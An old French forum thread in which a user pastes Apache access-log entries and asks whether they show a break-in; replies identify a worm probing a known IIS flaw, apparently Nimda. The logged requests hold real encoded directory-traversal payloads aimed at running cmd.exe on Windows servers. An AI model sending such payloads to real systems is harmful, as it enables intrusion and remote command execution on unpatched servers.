pkoi g plein de ... dans mon access.log de apache?? - Logiciels - Windows & Software
Marsh Posté le 01-10-2002 à 21:24:46
fils_de_la_lumiere a écrit a écrit : pkoi g plein de 80.15.184.198 - - [19/Sep/2002:17:49:55 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 80.15.184.198 - - [19/Sep/2002:17:49:57 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 80.15.184.198 - - [19/Sep/2002:17:50:01 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 80.15.184.198 - - [19/Sep/2002:17:50:02 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 80.15.184.198 - - [19/Sep/2002:17:50:06 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 326 80.15.184.198 - - [19/Sep/2002:17:50:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 326 80.15.184.198 - - [19/Sep/2002:17:50:11 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 80.15.184.198 - - [19/Sep/2002:17:50:14 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 dans mon access;log de apache?? tentative de hack??? comment savoir si ca a reussi? |
a la base cela marchera pas
c'est un ver a la con ciblé sur la faille vivante IIS
donc tu peux eventueller envoyer un mail au proprio de cet ip pour qu'il patche son ordi
Marsh Posté le 01-10-2002 à 21:28:44
Lis cet article
http://www.secuser.com/alertes/2001/nimda.htm
Nimda a plus d'un tour dans son sac
Marsh Posté le 01-10-2002 à 21:15:33
pkoi g plein de
80.15.184.198 - - [19/Sep/2002:17:49:55 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
80.15.184.198 - - [19/Sep/2002:17:49:57 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
80.15.184.198 - - [19/Sep/2002:17:50:01 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
80.15.184.198 - - [19/Sep/2002:17:50:02 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
80.15.184.198 - - [19/Sep/2002:17:50:06 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 326
80.15.184.198 - - [19/Sep/2002:17:50:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 326
80.15.184.198 - - [19/Sep/2002:17:50:11 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
80.15.184.198 - - [19/Sep/2002:17:50:14 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
dans mon access;log de apache??
tentative de hack??? comment savoir si ca a reussi?
Message édité par fils_de_la_lumiere le 01-10-2002 à 21:15:54